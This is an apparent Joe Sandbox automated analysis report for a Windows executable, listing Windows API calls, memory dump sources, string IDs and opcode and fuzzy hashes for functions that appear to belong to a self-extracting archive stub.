              • Instruction Fuzzy Hash: 6BA01230194006678B000B34CC09C1576945760B02F0087207002C10A0CF308814A500
              APIs
              • CloseHandle.KERNELBASE(000000FF,?,?,00B8968F,?,?,?,?,00BB1FA1,000000FF), ref: 00B896EB
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CloseHandle
              • String ID:
              • API String ID: 2962429428-0
              • Opcode ID: 2c0809e4cc501b9244f517ea33055ec750118beae7a6d4492d20a1138bdf8abf
              • Instruction ID: c94856fe226299e1ac3cae8d373fcb7baa248f1ca63b9cbe1e7f58c1a9cac578
              • Opcode Fuzzy Hash: 2c0809e4cc501b9244f517ea33055ec750118beae7a6d4492d20a1138bdf8abf
              • Instruction Fuzzy Hash: 36F05E31556B048FDF30AA24D5487A2B7E49B12725F088B9E90E7434B0A761688DCB00
              APIs
                • Part of subcall function 00B8130B: GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
                • Part of subcall function 00B8130B: SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B9B971
              • EndDialog.USER32(?,00000006), ref: 00B9B984
              • GetDlgItem.USER32(?,0000006C), ref: 00B9B9A0
              • SetFocus.USER32(00000000), ref: 00B9B9A7
              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00B9B9E1
              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B9BA18
              • FindFirstFileW.KERNEL32(?,?), ref: 00B9BA2E
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B9BA4C
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B9BA5C
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B9BA78
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B9BA94
              • _swprintf.LIBCMT ref: 00B9BAC4
                • Part of subcall function 00B8400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B8401D
              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B9BAD7
              • FindClose.KERNEL32(00000000), ref: 00B9BADE
              • _swprintf.LIBCMT ref: 00B9BB37
              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00B9BB4A
              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B9BB67
              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00B9BB87
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B9BB97
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B9BBB1
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B9BBC9
              • _swprintf.LIBCMT ref: 00B9BBF5
              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B9BC08
              • _swprintf.LIBCMT ref: 00B9BC5C
              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00B9BC6F
                • Part of subcall function 00B9A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B9A662
                • Part of subcall function 00B9A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00BBE600,?,?), ref: 00B9A6B1
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
              • API String ID: 797121971-1840816070
              • Opcode ID: 7e3c71df7486448a98c8c4b9009689407b3c2ab709960151525af14b69933d7b
              • Instruction ID: 70e6d1bdabade18fc4eebf1d4e0777ea7e79fc4f49e6597fa8b1d039659931e7
              • Opcode Fuzzy Hash: 7e3c71df7486448a98c8c4b9009689407b3c2ab709960151525af14b69933d7b
              • Instruction Fuzzy Hash: 6F919372248348BFD621ABA4DD89FFB77ECEB49700F040969B749D7091DB71A604C762
              APIs
              • __EH_prolog.LIBCMT ref: 00B87191
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00B872F1
              • CloseHandle.KERNEL32(00000000), ref: 00B87301
                • Part of subcall function 00B87BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B87C04
                • Part of subcall function 00B87BF5: GetLastError.KERNEL32 ref: 00B87C4A
                • Part of subcall function 00B87BF5: CloseHandle.KERNEL32(?), ref: 00B87C59
              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00B8730C
              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B8741A
              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00B87446
              • CloseHandle.KERNEL32(?), ref: 00B87457
              • GetLastError.KERNEL32 ref: 00B87467
              • RemoveDirectoryW.KERNEL32(?), ref: 00B874B3
              • DeleteFileW.KERNEL32(?), ref: 00B874DB
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
              • API String ID: 3935142422-3508440684
              • Opcode ID: ccadc08f97215ff7b239dfa1b63d0ce41ab19f59f170e2e62c8f8a2f080ffbef
              • Instruction ID: 184b75e355aee166a06e266cc29427efe721e46411661dcabcd825b290e60f88
              • Opcode Fuzzy Hash: ccadc08f97215ff7b239dfa1b63d0ce41ab19f59f170e2e62c8f8a2f080ffbef
              • Instruction Fuzzy Hash: C2B1E071904215ABDF20EBA4CC81BEE77F8EF04704F1401E9F909E7252EB74AA49CB61
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID: CMT$h%u$hc%u
              • API String ID: 3004599000-3282847064
              • Opcode ID: 0b2c6266a967ffcf7a19d064917da4de13482eba7e949e17c8b445a245ec1834
              • Instruction ID: fdc7c1dadaf8367f80933c15c0d8effb51d2fa83538e31143a2534146395b336
              • Opcode Fuzzy Hash: 0b2c6266a967ffcf7a19d064917da4de13482eba7e949e17c8b445a245ec1834
              • Instruction Fuzzy Hash: C232A7715142849FDF14EF74C895AEA3BE5EF54B00F0444BEFD8A8B292EB709949CB60
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: 68c8f7e7127c98a44103df9fd384ae3d397ad02ec4824faa962a17656f750480
              • Instruction ID: 32e16db43efd3ce4360104f090637170c1b30db4f9baad1e6d76c25766354c61
              • Opcode Fuzzy Hash: 68c8f7e7127c98a44103df9fd384ae3d397ad02ec4824faa962a17656f750480
              • Instruction Fuzzy Hash: 40C23871E086288FDB25CE28DD407EAB7F5EB86304F1541EAD85EE7640E775AE818F40
              APIs
              • __EH_prolog.LIBCMT ref: 00B827F1
              • _strlen.LIBCMT ref: 00B82D7F
                • Part of subcall function 00B9137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B8B652,00000000,?,?,?,00010442), ref: 00B91396
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B82EE0
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
              • String ID: CMT
              • API String ID: 1706572503-2756464174
              • Opcode ID: 51e063444f6d81852404ed8dcc0b292f47861cdc2ae14cb54a93bf1c69c851fe
              • Instruction ID: af0871a0caa10740ce7a13f684a88368aa94dd01cfca00dbdbc35c599f1cee60
              • Opcode Fuzzy Hash: 51e063444f6d81852404ed8dcc0b292f47861cdc2ae14cb54a93bf1c69c851fe
              • Instruction Fuzzy Hash: C262E5715042448FDF19EF38C8966EA3BE1EF54304F0545BEED9A8B2A2DB70E945CB60
              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00BA8767
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00BA8771
              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00BA877E
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: 5ce9e86f3c576be94128be578a5bbe0ec1636d679a03a70b53984d5be0fd9c74
              • Instruction ID: e0c7b881b6385d1221f21dc56033a52b2d45ce1ee704cc2a360596fca572c4c2
              • Opcode Fuzzy Hash: 5ce9e86f3c576be94128be578a5bbe0ec1636d679a03a70b53984d5be0fd9c74
              • Instruction Fuzzy Hash: F031C6759012299BCB61DF28D88879CB7F8AF08710F5041EAE81CA7250EB749F858F44
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID: .
              • API String ID: 0-248832578
              • Opcode ID: 7cc239b66b3a27399dd333c92d5497b76b3f93872373b0b539edd432ee6f4dd6
              • Instruction ID: 5e2ded2899e2c1ae915c017d9837020d59ca733d3c539a3aef6b66df5bd3868d
              • Opcode Fuzzy Hash: 7cc239b66b3a27399dd333c92d5497b76b3f93872373b0b539edd432ee6f4dd6
              • Instruction Fuzzy Hash: B631C1719042096BDB249E79CC84EEABBEEDB86314F1401E8E51997251EA309D44CB70
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
              • Instruction ID: 92b6a20beec81f6b1e224bacc323cf49cfa19ffe5eb42e7cb37f1eb3f724a733
              • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
              • Instruction Fuzzy Hash: 93024D71E042199FDF14CFA9C8806ADBBF1EF89314F2581AAD819E7384D731AD458B84
              APIs
              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B9A662
              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00BBE600,?,?), ref: 00B9A6B1
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: FormatInfoLocaleNumber
              • String ID:
              • API String ID: 2169056816-0
              • Opcode ID: fcb0a2e73855cf6def59d20f1de95c9ea55b897814be78d7611a770893fe8a16
              • Instruction ID: 8c437f4d48eb1e2fac59d8e70bfbbe48d3e77e906be273a79b48d94fbf743e92
              • Opcode Fuzzy Hash: fcb0a2e73855cf6def59d20f1de95c9ea55b897814be78d7611a770893fe8a16
              • Instruction Fuzzy Hash: 6E019E36510208BFDB109F64DC05FABB7FCEF08710F005562FA15A7160E7B0AA1487A9
              APIs
              • GetLastError.KERNEL32(00B9117C,?,00000200), ref: 00B86EC9
              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00B86EEA
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Similarity
              • API ID: ErrorFormatLastMessage
              • String ID:
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BB118F,?,?,00000008,?,?,00BB0E2F,00000000), ref: 00BB13C1
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              Strings
              Similarity
              • API ID:
              • String ID: gj
              APIs
              • GetVersionExW.KERNEL32(?), ref: 00B8AD1A
              Similarity
              • API ID: Version
              • String ID:
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00B9EAC5), ref: 00B9F068
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              Similarity
              • API ID: HeapProcess
              • String ID:
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 468fc6c1b17626a3aa500faa91954ce5db22646cd83729aadec68836f774db87
              • Instruction ID: 41950ecc3faca5f4640c03678da97ce316ca1ec35b73e742a1cdb049c6dc85a8
              • Opcode Fuzzy Hash: 468fc6c1b17626a3aa500faa91954ce5db22646cd83729aadec68836f774db87
              • Instruction Fuzzy Hash: 76D1D2B1A083458FDF14DF69C880B5ABBE0EF95308F0445BDE8849B642D734E959CB9A
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
              • Instruction ID: fb204b54852136d225a0f52db23ac4ab7f94b2cc46ba682fdb85bc7f3d8534e3
              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
              • Instruction Fuzzy Hash: CDC1943622D1530ADF2D5A39857443FBAE19AA37B171A07EDD4B3CB1C5FE20D924DA20
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 013b28ff2e2cf5cc4f372b18ee661587455bc6b4868927df10088c12ebc6ca82
              • Instruction ID: d56623e139d74f6e53c2c4b437013fafd3d75d50d9d1c9e47c2875e4944e30ac
              • Opcode Fuzzy Hash: 013b28ff2e2cf5cc4f372b18ee661587455bc6b4868927df10088c12ebc6ca82
              • Instruction Fuzzy Hash: 4DE136745083849FC314CF29D49096ABBF0AB9E300F89099EF9D597352D735EA09DB62
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
              • Instruction ID: 9cc3bc8878f1afd36814e26c7238b5c3f4b599e6e6d7ccaba877870874e91348
              • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
              • Instruction Fuzzy Hash: F19145B02047498BDF24EF68D8D1BBE77E5EB90700F1009BEE597C7282DA74AA45C752
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fb43c007f79b22801298eb8cf5b9993415b80807a61810c279d0669cc53c2c4
              • Instruction ID: 74169f61676d2fc391c63bd208fa30ac75ce42ef8cfaa8417493dad9de547831
              • Opcode Fuzzy Hash: 2fb43c007f79b22801298eb8cf5b9993415b80807a61810c279d0669cc53c2c4
              • Instruction Fuzzy Hash: D761777168C7086ADE389928C896BBF73C8EBC3700F500ADAE482DB281D7D1DD42C759
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
              • Instruction ID: f6e4ffb908bbac8305c8795b8d8743b8d6089cf00ec06f371c1852ac90cd23de
              • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
              • Instruction Fuzzy Hash: 79713C717047454BDF24DF28C8D0BAD77E5EB91B04F0049BDE5C78B282DA749A89C752
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              APIs
              • _swprintf.LIBCMT ref: 00B8DABE
                • Part of subcall function 00B8400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B8401D
                • Part of subcall function 00B91596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00BC0EE8,00000200,00B8D202,00000000,?,00000050,00BC0EE8), ref: 00B915B3
              • _strlen.LIBCMT ref: 00B8DADF
              • SetDlgItemTextW.USER32(?,00BBE154,?), ref: 00B8DB3F
              • GetWindowRect.USER32(?,?), ref: 00B8DB79
              • GetClientRect.USER32(?,?), ref: 00B8DB85
              • GetWindowLongW.USER32(?,000000F0), ref: 00B8DC25
              • GetWindowRect.USER32(?,?), ref: 00B8DC52
              • SetWindowTextW.USER32(?,?), ref: 00B8DC95
              • GetSystemMetrics.USER32(00000008), ref: 00B8DC9D
              • GetWindow.USER32(?,00000005), ref: 00B8DCA8
              • GetWindowRect.USER32(00000000,?), ref: 00B8DCD5
              • GetWindow.USER32(00000000,00000002), ref: 00B8DD47
              Similarity
              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
              • String ID: $%s:$CAPTION$d
              • API String ID: 2407758923-2512411981
              APIs
              • ___free_lconv_mon.LIBCMT ref: 00BAC277
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE2F
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE41
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE53
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE65
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE77
